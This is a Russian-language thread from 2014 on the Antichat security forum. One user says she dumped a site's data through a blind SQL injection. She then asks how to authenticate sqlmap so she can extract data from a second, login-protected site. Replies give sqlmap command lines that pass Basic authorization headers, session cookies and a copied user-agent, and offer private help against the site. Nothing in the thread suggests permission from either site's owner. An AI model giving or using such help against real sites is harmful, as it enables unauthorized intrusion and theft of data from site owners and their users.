HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.07.2014, 18:45
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

В общем, дела обстоят так. Нашла уязвимый параметр на одном сайте. Оказалось

Код:
Code:
Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
Слила всю информацию, всё шикарно

Но есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть.

Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта?

При вводе

Код:
Code:
./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1&param2=2&param3=3&paramvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5"
Ответ

Код:
Code:
sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
и дальше уже такое впечатление, что он до нужной локации с уязвимым параметром paramvuln не доходит (на открытом сайте всё раскручивалось ну ооооч быстро)

Помогите плиз
 
Ответить с цитированием

  #2  
Старый 05.07.2014, 19:00
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

После авторизации будет передаваться хидер, типа:

Код:
Code:
Authorization: Basic YWRtaW46YWRtaW4
Где YWRtaW46YWRtaW4=admin:admin.

Соответственно, нужно использовать что-то типа:

Код:
Code:
./sqlmap.py --headers="Authorization: Basic YWRtaW46YWRtaW4" -u "...
Вместо YWRtaW46YWRtaW4 берешь логин:пароль, кодируешь в base64 и вставляешь.
 
Ответить с цитированием

  #3  
Старый 08.07.2014, 04:05
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

не помогает. И присоединение --cookie= с PHPSESSION
 
Ответить с цитированием

  #4  
Старый 08.07.2014, 05:54
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
не помогает. И присоединение --cookie= с PHPSESSION
Может PHPSESSID генерируется с использованим User-Agent и т.д. и т.п. Попробуй полностью спарсить то, что отправляет браузер и через --headers отправить.
 
Ответить с цитированием

  #5  
Старый 17.07.2014, 17:14
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

ничего так и не вышло. Если кто может посмотреть на сайт, пришлите PM что ли
 
Ответить с цитированием

  #6  
Старый 18.07.2014, 21:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

ТС, отпишите в лс, посмотрим на ваш сайт. Вообще, надо просто вставить плюшки после авторизации, иногда нужен идентичный user-agent.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ